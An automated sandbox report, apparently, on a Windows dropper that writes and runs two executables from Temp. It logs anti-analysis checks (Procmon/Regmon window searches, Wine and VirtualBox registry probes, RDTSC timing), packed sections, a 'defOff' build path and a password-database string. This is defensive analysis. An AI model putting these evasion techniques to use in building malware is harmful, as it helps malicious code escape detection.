Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File created: C:\Users\user~1\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: s31ydU1MpQ.exe, 00000000.00000003.1342976412.0000000005936000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1368274630.000000000596F000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1342888676.000000000596A000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1368379310.0000000005962000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: s31ydU1MpQ.exe Virustotal: Detection: 52%
Source: s31ydU1MpQ.exe ReversingLabs: Detection: 60%
Source: HXPC21YC8H3Q6AWWXLQHI1I.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: HXPC21YC8H3Q6AWWXLQHI1I.exe String found in binary or memory: 3The file %s is missing. Please, re-install this application
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File read: C:\Users\user\Desktop\s31ydU1MpQ.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\s31ydU1MpQ.exe "C:\Users\user\Desktop\s31ydU1MpQ.exe"
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Process created: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe "C:\Users\user~1\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe"
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Process created: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe "C:\Users\user~1\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe"
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Process created: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe "C:\Users\user~1\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe" Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Process created: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe "C:\Users\user~1\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe" Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: s31ydU1MpQ.exe Static file information: File size 1843200 > 1048576
Source: s31ydU1MpQ.exe Static PE information: Raw size of npsrnsek is bigger than: 0x100000 < 0x199c00
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: HXPC21YC8H3Q6AWWXLQHI1I.exe, 0000000A.00000002.1716963563.0000000000B02000.00000040.00000001.01000000.00000006.sdmp

Data Obfuscation

barindex
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Unpacked PE file: 10.2.HXPC21YC8H3Q6AWWXLQHI1I.exe.b00000.0.unpack :EW;.rsrc:W;.idata :W;tnrxecbv:EW;anayjrgy:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Unpacked PE file: 11.2.BGXAMSUR4L24WR8IH77.exe.680000.0.unpack :EW;.rsrc:W;.idata :W;wwqufnsk:EW;dutjqjqn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;wwqufnsk:EW;dutjqjqn:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: BGXAMSUR4L24WR8IH77.exe.0.dr Static PE information: real checksum: 0x2d28a0 should be: 0x2c6754
Source: s31ydU1MpQ.exe Static PE information: real checksum: 0x1c6b8f should be: 0x1c2eb5
Source: HXPC21YC8H3Q6AWWXLQHI1I.exe.0.dr Static PE information: real checksum: 0x2c49df should be: 0x2b6c61
Source: s31ydU1MpQ.exe Static PE information: section name:
Source: s31ydU1MpQ.exe Static PE information: section name: .idata
Source: s31ydU1MpQ.exe Static PE information: section name:
Source: s31ydU1MpQ.exe Static PE information: section name: npsrnsek
Source: s31ydU1MpQ.exe Static PE information: section name: lghaogpm
Source: s31ydU1MpQ.exe Static PE information: section name: .taggant
Source: HXPC21YC8H3Q6AWWXLQHI1I.exe.0.dr Static PE information: section name:
Source: HXPC21YC8H3Q6AWWXLQHI1I.exe.0.dr Static PE information: section name: .idata
Source: HXPC21YC8H3Q6AWWXLQHI1I.exe.0.dr Static PE information: section name: tnrxecbv
Source: HXPC21YC8H3Q6AWWXLQHI1I.exe.0.dr Static PE information: section name: anayjrgy
Source: HXPC21YC8H3Q6AWWXLQHI1I.exe.0.dr Static PE information: section name: .taggant
Source: BGXAMSUR4L24WR8IH77.exe.0.dr Static PE information: section name:
Source: BGXAMSUR4L24WR8IH77.exe.0.dr Static PE information: section name: .idata
Source: BGXAMSUR4L24WR8IH77.exe.0.dr Static PE information: section name: wwqufnsk
Source: BGXAMSUR4L24WR8IH77.exe.0.dr Static PE information: section name: dutjqjqn
Source: BGXAMSUR4L24WR8IH77.exe.0.dr Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_0131DCAC push eax; ret 0_3_0131DCAD
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_0131DF75 pushad ; ret 0_3_0131DF81
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_01305418 push esi; iretd 0_3_01305422
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_01305418 push esi; iretd 0_3_01305422
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_01305418 push esi; iretd 0_3_01305422
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_0130154F push esi; retf 0_3_01301552
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_0130154F push esi; retf 0_3_01301552
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_0130154F push esi; retf 0_3_01301552
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_013043F3 push esp; iretd 0_3_01304412
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_013043F3 push esp; iretd 0_3_01304412
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_013043F3 push esp; iretd 0_3_01304412
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_013031EC push esi; retf 0_3_013031EF
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_013031EC push esi; retf 0_3_013031EF
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_013031EC push esi; retf 0_3_013031EF
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_01305418 push esi; iretd 0_3_01305422
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_01305418 push esi; iretd 0_3_01305422
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_01305418 push esi; iretd 0_3_01305422
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_0130154F push esi; retf 0_3_01301552
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_0130154F push esi; retf 0_3_01301552
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_0130154F push esi; retf 0_3_01301552
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_013043F3 push esp; iretd 0_3_01304412
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_013043F3 push esp; iretd 0_3_01304412
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_013043F3 push esp; iretd 0_3_01304412
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_013031EC push esi; retf 0_3_013031EF
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_013031EC push esi; retf 0_3_013031EF
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_013031EC push esi; retf 0_3_013031EF
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_01305418 push esi; iretd 0_3_01305422
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_01305418 push esi; iretd 0_3_01305422
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_01305418 push esi; iretd 0_3_01305422
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_0130154F push esi; retf 0_3_01301552
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_0130154F push esi; retf 0_3_01301552
Source: s31ydU1MpQ.exe Static PE information: section name: entropy: 7.972189895344259
Source: s31ydU1MpQ.exe Static PE information: section name: npsrnsek entropy: 7.95317803720264
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File created: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Jump to dropped file
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File created: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Jump to dropped file

Boot Survival

barindex
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 658312 second address: 65831C instructions: 0x00000000 rdtsc 0x00000002 jne 00007FCBAD522AA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 657BA3 second address: 657BB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 657BB0 second address: 657BB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7D0DB0 second address: 7D0DB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7D6C24 second address: 7D6C4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007FCBAD522AA6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FCBAD522AB5h 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7D6C4A second address: 7D6C5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D11Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7D6C5C second address: 7D6C60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7D6F31 second address: 7D6F37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7D70D5 second address: 7D70F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBAD522AB8h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
